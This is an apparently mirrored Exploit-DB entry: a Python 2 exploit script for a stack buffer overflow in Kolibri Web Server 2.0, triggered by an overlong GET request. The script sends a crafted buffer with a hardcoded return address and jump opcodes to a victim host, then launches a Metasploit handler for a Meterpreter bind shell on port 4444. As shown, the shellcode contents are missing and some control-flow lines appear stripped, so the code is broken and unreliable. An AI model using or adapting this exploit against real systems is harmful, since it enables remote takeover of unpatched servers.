Kolibri Web Server 2.0 – GET Stack Buffer Overflow

  • 作者: Polunchis
    日期: 2014-04-25
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/33027/
  • #!/usr/bin/python 
    # Exploit Title: Kolibri GET request Stack buffer Overflow 
    # Date: 25 April 2014
    # Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
    # Vendor Homepage: http://www.senkas.com/kolibri/download.php
    # Version: Kolibri 2.0 
    # Tested on: Windows XP SP3,Spanish
    # Thanks:To my wife for putting up with my possessions
    # Description: 
    # A buffer overflow is triggered when a long GET command is sent to the server.
    import socket, sys, os, time 
    if len(sys.argv) != 3:
    	print "[*] Uso: %s <Ip Victima> <Puerto> \n" % sys.argv[0]
    print "[*] Exploit created by Polunchis"
    print "[*] https://www.intrusionlabs.com.mx"
    host = sys.argv[1] 
    port = int(sys.argv[2])
    #./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b '\x00\xff\x0a\x0d\x20\x40'
    shellcode = (
    nop ="A" * 33 + '\x90' * 20
    junk = "C" *(515-(len(nop)+len(shellcode)))
    opcode= "\x83\xc4\x44\x83\xc4\x44\x83\xc4\x44\xff\xe4"
    eip = '\x63\x46\x92\x7c'
    #7c86467b 7C924663 call esp
    buffer = nop + shellcode + junk + eip + opcode + "B" * 60 
    req = ("GET /" + buffer + " HTTP/1.1\r\n"
    "Host: " + host + ":" + str(port) + "\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv: Gecko/20101026 Firefox/3.6.12\r\n"
    "Connection: keep-alive\r\n\r\n")
    print "[+] Connecting to %s:%d" % (host, port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    	s.connect((host, port))
    	print "[+] Sending payload.." + "nop: " + str(len(nop)) + " junk: " + str(len(junk)) + " shellcode: " + str(len(shellcode))
    	data = s.recv(1024)
    	print "[+] Closing connection.."
    	print "[+] Exploit Sent Successfully"
    	print "[+] Waiting for 3 sec before spawning shell to " + host + ":4444\r"
    	print "\r"
    os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST= LPORT=4444 E")
    	print "[-] Connection lost from " + host + ":4444 \r"
    	print "[-] Could not connect to " + host + ":4444\r"